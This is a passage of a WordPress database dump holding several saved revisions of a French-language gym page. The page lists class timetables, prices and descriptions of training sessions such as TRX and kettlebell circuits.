padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:38:00', '2013-07-03 17:38:00', '', 11, 'http://www.crosstrainingcenter.be/?p=189', 0, 'revision', '', 0),
(188, 1, '2013-07-03 17:35:03', '2013-07-03 17:35:03', '<h2>Team Training :</h2>\r\n<h4>En semaine :</h4>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4>Le week-end :</h4>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td></td>\r\n<td>LUNDI</td>\r\n<td>MARDI</td>\r\n<td>MERCREDI</td>\r\n<td>JEUDI</td>\r\n<td>VENDREDI</td>\r\n</tr>\r\n<tr>\r\n<td>17h30</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr>\r\n<td>18h15</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n</tr>\r\n<tr>\r\n<td>19h00</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n</tr>\r\n<tr>\r\n<td>19h45</td>\r\n<td>CARDIO</td>\r\n<td>RIP-KETTLE</td>\r\n<td>GLFE</td>\r\n<td>TRX</td>\r\n<td>CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:35:03', '2013-07-03 17:35:03', '', 11, 'http://www.crosstrainingcenter.be/?p=188', 0, 'revision', '', 0),
(190, 1, '2013-07-03 17:38:41', '2013-07-03 17:38:41', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:38:41', '2013-07-03 17:38:41', '', 11, 'http://www.crosstrainingcenter.be/?p=190', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(191, 1, '2013-07-03 17:39:35', '2013-07-03 17:39:35', '<h2>Team Training :</h2>\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 25%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 